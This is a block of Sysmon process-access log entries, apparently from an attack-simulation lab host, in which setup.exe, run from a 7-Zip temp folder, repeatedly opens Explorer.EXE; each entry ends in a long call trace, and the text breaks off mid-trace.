13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+